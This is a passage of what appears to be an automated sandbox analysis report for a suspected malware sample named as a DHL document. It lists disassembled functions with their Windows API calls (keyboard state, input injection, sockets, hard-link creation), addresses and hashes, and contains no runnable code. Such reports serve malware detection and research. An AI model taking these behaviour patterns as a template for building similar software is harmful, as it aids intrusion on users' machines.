                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                      • String ID: %lu
                                                                                      • API String ID: 2507767853-685833217
                                                                                      • Opcode ID: 72802eeef5fec6b0ceec6192b075fefa2d0f09959c8565491c72ba322cbc199b
                                                                                      • Instruction ID: 3a71414d7a3c692bf3cc9450a24765533153ecdb6b66c03b75671f4eadbc12d0
                                                                                      • Opcode Fuzzy Hash: 72802eeef5fec6b0ceec6192b075fefa2d0f09959c8565491c72ba322cbc199b
                                                                                      • Instruction Fuzzy Hash: B2312F75A00109AFD710DF54C885EAABBF8EF05318F149095F505EB252D771EE45CB71
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E3424F
                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E34264
                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E34271
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: msctls_trackbar32
                                                                                      • API String ID: 3850602802-1010561917
                                                                                      • Opcode ID: 354ea747ee9a96a0d482dd672f99b8dcb123601ad14b52d25cbe8cb27d25b388
                                                                                      • Instruction ID: 55656a0d9be7c72cb893396759f78c20f65d61fbad5e9a04efe255fb539c5988
                                                                                      • Opcode Fuzzy Hash: 354ea747ee9a96a0d482dd672f99b8dcb123601ad14b52d25cbe8cb27d25b388
                                                                                      • Instruction Fuzzy Hash: 3811A371240248BEEF205E69CC0AFAB3BACEF95B58F111514FA55F60E0D671E851DB20
                                                                                      APIs
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                        • Part of subcall function 00E02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E02DC5
                                                                                        • Part of subcall function 00E02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E02DD6
                                                                                        • Part of subcall function 00E02DA7: GetCurrentThreadId.KERNEL32 ref: 00E02DDD
                                                                                        • Part of subcall function 00E02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E02DE4
                                                                                      • GetFocus.USER32 ref: 00E02F78
                                                                                        • Part of subcall function 00E02DEE: GetParent.USER32(00000000), ref: 00E02DF9
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E02FC3
                                                                                      • EnumChildWindows.USER32(?,00E0303B), ref: 00E02FEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                      • String ID: %s%d
                                                                                      • API String ID: 1272988791-1110647743
                                                                                      • Opcode ID: 3b4a0d4f03f83763e8c4654bede96febf5f327f7b558a413b156d40f8a8a449f
                                                                                      • Instruction ID: 0e5dc82f682d163f5cda5e724da90a74056152ce68883ea6bdb722827bb1dfae
                                                                                      • Opcode Fuzzy Hash: 3b4a0d4f03f83763e8c4654bede96febf5f327f7b558a413b156d40f8a8a449f
                                                                                      • Instruction Fuzzy Hash: B911A271700209ABCF157F708C8AEED77AAAF94304F146079B909BB192DE3099898B70
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E358C1
                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E358EE
                                                                                      • DrawMenuBar.USER32(?), ref: 00E358FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                      • String ID: 0
                                                                                      • API String ID: 3227129158-4108050209
                                                                                      • Opcode ID: 49b5a9f89b39b3ca532d1a26c360dd905fa02644de522c93d423990dea252576
                                                                                      • Instruction ID: c74bac9a48d32fc0377bd320d01d36eced38ee56bc785b494275c8d3a12b978e
                                                                                      • Opcode Fuzzy Hash: 49b5a9f89b39b3ca532d1a26c360dd905fa02644de522c93d423990dea252576
                                                                                      • Instruction Fuzzy Hash: A9011B32500218EEDB219F11DC49BEEBFB5FB85365F108099F859E6251DB308A94DF31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 780d481f85b05ea53af78a509ab9fed8502fcdb044a441bf3862e33fbfdb507b
                                                                                      • Instruction ID: 5b7f7504583a3ea3ab11030f7cf1c40e02ccce767f6ceefdbfdfbbaa4c0fe4e1
                                                                                      • Opcode Fuzzy Hash: 780d481f85b05ea53af78a509ab9fed8502fcdb044a441bf3862e33fbfdb507b
                                                                                      • Instruction Fuzzy Hash: B0C12A75A0021AEFDB15CF94C894BAEB7B5FF48704F209598E505EB291D731EE81CB90
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 1998397398-0
                                                                                      • Opcode ID: b1e2eb61a35ed34619e428819f763ea14ec406ea103fdf2fb220a6a468c70bef
                                                                                      • Instruction ID: 249d2a2c0365079fb271f334b07bceb9bf96534aaf82d69c85deaa61abc59379
                                                                                      • Opcode Fuzzy Hash: b1e2eb61a35ed34619e428819f763ea14ec406ea103fdf2fb220a6a468c70bef
                                                                                      • Instruction Fuzzy Hash: 54A14D756043109FC700EF24D885A6AB7E5FF89714F148859F98AAB3A2DB34ED41CFA1
                                                                                      APIs
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E3FC08,?), ref: 00E005F0
                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E3FC08,?), ref: 00E00608
                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00E3CC40,000000FF,?,00000000,00000800,00000000,?,00E3FC08,?), ref: 00E0062D
                                                                                      • _memcmp.LIBVCRUNTIME ref: 00E0064E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 314563124-0
                                                                                      • Opcode ID: 3907888c0d94d1e8176000aa69fa5d7c694bcfcc90b72f612378ae3840d3fdc5
                                                                                      • Instruction ID: 0fe143627f35ce85ffe0ea04b6322bc1f2bda21f4cfc41c4bcb577adf301ccd3
                                                                                      • Opcode Fuzzy Hash: 3907888c0d94d1e8176000aa69fa5d7c694bcfcc90b72f612378ae3840d3fdc5
                                                                                      • Instruction Fuzzy Hash: 9C811B75A00109EFCB04DF94C988EEEB7B9FF89315F204558E516BB290DB71AE46CB60
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 475da8323783d86df435f1e1a4bef4774ee277a60cf8069c78d58bf289244f3b
                                                                                      • Instruction ID: 0cb81ae445897061d6fccf6c06385b1e3d06df871e7df8b26f53eb18f6f73dfd
                                                                                      • Opcode Fuzzy Hash: 475da8323783d86df435f1e1a4bef4774ee277a60cf8069c78d58bf289244f3b
                                                                                      • Instruction Fuzzy Hash: 6A412939700691ABDB217BFA9C45FBE7AE5EF41330F28422AF419D73D2E63488419671
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(00FCF100,?), ref: 00E362E2
                                                                                      • ScreenToClient.USER32(?,?), ref: 00E36315
                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E36382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                      • String ID:
                                                                                      • API String ID: 3880355969-0
                                                                                      • Opcode ID: ff4cc91abbbf7e5a098ade1411d697e5e79f0dffa08d17908a22ea5aaab4266a
                                                                                      • Instruction ID: 3850720578b76cd407e2a93bcfcbf8366c338be4b53a2d63c0a8631a1dadacd1
                                                                                      • Opcode Fuzzy Hash: ff4cc91abbbf7e5a098ade1411d697e5e79f0dffa08d17908a22ea5aaab4266a
                                                                                      • Instruction Fuzzy Hash: 6F514C75900209AFCF10DF68D8889AE7FB5FF85364F209159F915AB2A0D730ED81CB50
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00E21AFD
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E21B0B
                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E21B8A
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E21B94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$socket
                                                                                      • String ID:
                                                                                      • API String ID: 1881357543-0
                                                                                      • Opcode ID: 18df843e2bbdd8cd2dc149abc615e7fec2134e5a939f99717c964bd645e0bfe9
                                                                                      • Instruction ID: 836b840f30e39d8fcd4f6498fe34e323a3ba3efe21e18230b07daeb43c6e2834
                                                                                      • Opcode Fuzzy Hash: 18df843e2bbdd8cd2dc149abc615e7fec2134e5a939f99717c964bd645e0bfe9
                                                                                      • Instruction Fuzzy Hash: 5741B334600210AFE720AF24D886F667BE5EF45718F548498F91AAF3D3D772ED418BA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 000ee2c6c46ac30dc2fb41dc3d6ce2be32c305e212ca9b4af1f8e4439bc7d957
                                                                                      • Instruction ID: 2787df88f22a92946db98a812ce94828ff83e3d43299f745b6a79d57585ab1b9
                                                                                      • Opcode Fuzzy Hash: 000ee2c6c46ac30dc2fb41dc3d6ce2be32c305e212ca9b4af1f8e4439bc7d957
                                                                                      • Instruction Fuzzy Hash: DC41D175A00744EFD724EF78C841BAABBA9EB88728F11452FF141DB382D771990187B0
                                                                                      APIs
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E15783
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00E157A9
                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E157CE
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E157FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 3321077145-0
                                                                                      • Opcode ID: 495fb00b339d13040e42798ac947c341d5b404c295c14ae7714774c1bef3fa5c
                                                                                      • Instruction ID: f8c89f485393a071b5df2829127b5cbb8afe4352ac50ad29c2a7f8eb64d9e55e
                                                                                      • Opcode Fuzzy Hash: 495fb00b339d13040e42798ac947c341d5b404c295c14ae7714774c1bef3fa5c
                                                                                      • Instruction Fuzzy Hash: 40411035600610DFCB11EF15C545A5EBBE2EF89724F19C498E84A6B3A2CB34FD41CBA1
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00DC6D71,00000000,00000000,00DC82D9,?,00DC82D9,?,00000001,00DC6D71,8BE85006,00000001,00DC82D9,00DC82D9), ref: 00DDD910
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DDD999
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DDD9AB
                                                                                      • __freea.LIBCMT ref: 00DDD9B4
                                                                                        • Part of subcall function 00DD3820: RtlAllocateHeap.NTDLL(00000000,?,00E71444,?,00DBFDF5,?,?,00DAA976,00000010,00E71440,00DA13FC,?,00DA13C6,?,00DA1129), ref: 00DD3852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: 66fc340948b8d2ea8ae53800c4b7a27e0cc527ccc3e83c59d357e210777dfc50
                                                                                      • Instruction ID: 32e6d9dcf68710e9d843c7422f67944da97404f0358ee2e8726293b5511961e1
                                                                                      • Opcode Fuzzy Hash: 66fc340948b8d2ea8ae53800c4b7a27e0cc527ccc3e83c59d357e210777dfc50
                                                                                      • Instruction Fuzzy Hash: 8731D072A0020AABDF249F65DC95EAE7BA6EB40310F190169FC04E7250EB36DD54CBB0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00E35352
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E35375
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E35382
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E353A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 3340791633-0
                                                                                      • Opcode ID: b8faca97373b5e109134853c6faef7e2132c3bf3d2ddbba0f783ef42414ddd43
                                                                                      • Instruction ID: 1731f708764b5fd4234fe43f71ed769620390996196ca46e1f313b84f5952447
                                                                                      • Opcode Fuzzy Hash: b8faca97373b5e109134853c6faef7e2132c3bf3d2ddbba0f783ef42414ddd43
                                                                                      • Instruction Fuzzy Hash: C931E432A55A0CEFEB309B14CC0EBE83FA1EB05394F586501FA10B63E4C7B09980DB52
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E0ABF1
                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E0AC0D
                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E0AC74
                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E0ACC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: f111c531450d3b721f76957ebb98d3ecc291834ccbcedb83af58e303fa14e1e9
                                                                                      • Instruction ID: 8d1a0a84cab9d41b560381e4dd91d7737e982c6c2302b16f86576e434d352d95
                                                                                      • Opcode Fuzzy Hash: f111c531450d3b721f76957ebb98d3ecc291834ccbcedb83af58e303fa14e1e9
                                                                                      • Instruction Fuzzy Hash: 95311630A0471CAFFB35CB658C497FEBAA5AB49314F0D622AE485761D1C37489C58752
                                                                                      APIs
                                                                                      • ClientToScreen.USER32(?,?), ref: 00E3769A
                                                                                      • GetWindowRect.USER32(?,?), ref: 00E37710
                                                                                      • PtInRect.USER32(?,?,00E38B89), ref: 00E37720
                                                                                      • MessageBeep.USER32(00000000), ref: 00E3778C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1352109105-0
                                                                                      • Opcode ID: b63e290e79b8a0124e341efce0bc34e1a51637a723169a9b0cf0164e92b2b67b
                                                                                      • Instruction ID: 5376481da4f5e5a58619f7d81111e90725e39a2254ddef9b8f1c04fc9e5e4b1a
                                                                                      • Opcode Fuzzy Hash: b63e290e79b8a0124e341efce0bc34e1a51637a723169a9b0cf0164e92b2b67b
                                                                                      • Instruction Fuzzy Hash: 2E41BFB4605218EFCB21CF59C899EA97FF0FB48315F1550AAE594BB260C330E946CF90
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 00E316EB
                                                                                        • Part of subcall function 00E03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E03A57
                                                                                        • Part of subcall function 00E03A3D: GetCurrentThreadId.KERNEL32 ref: 00E03A5E
                                                                                        • Part of subcall function 00E03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E025B3), ref: 00E03A65
                                                                                      • GetCaretPos.USER32(?), ref: 00E316FF
                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00E3174C
                                                                                      • GetForegroundWindow.USER32 ref: 00E31752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
